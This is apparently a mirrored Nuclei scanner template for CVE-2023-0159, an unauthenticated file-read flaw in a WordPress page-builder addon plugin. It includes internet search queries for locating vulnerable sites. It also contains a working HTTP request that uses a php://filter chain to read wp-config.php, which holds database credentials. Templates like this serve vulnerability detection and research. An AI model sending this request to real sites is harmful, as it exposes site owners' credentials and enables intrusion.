daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-0159.yaml

51 lines
2.1 KiB
YAML
Raw Blame History

id: CVE-2023-0159
info:
name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
author: c4sper0
severity: high
description: |
The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
remediation: Fixed in 1.9.1
reference: |-
- https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/
- https://github.com/im-hanzou/EVCer
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/xu-xiang/awesome-security-vul-llm
- https://wordpress.org/plugins/extensive-vc-addon/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-0159
epss-score: 0.01059
epss-percentile: 0.84061
cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:*
metadata:
vendor: wprealize
product: extensive_vc_addons_for_wpbakery_page_builder
framework: wordpress
shodan-query: http.html:/wp-content/plugins/extensive-vc-addon/
fofa-query: body=/wp-content/plugins/extensive-vc-addon/
publicwww-query: "/wp-content/plugins/extensive-vc-addon/"
tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"status":"success","message":"Items are loaded","data":'
- type: status
status:
- 200
# digest: 4b0a00483046022100d24028d90f855321d541394c206888ac3de32ddc95fd192f2cea84c3ce106573022100b06dfd2c7fe33e022d5bc25a563682c01a13c1ca7e839fe8ebbf28f79406baa1:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink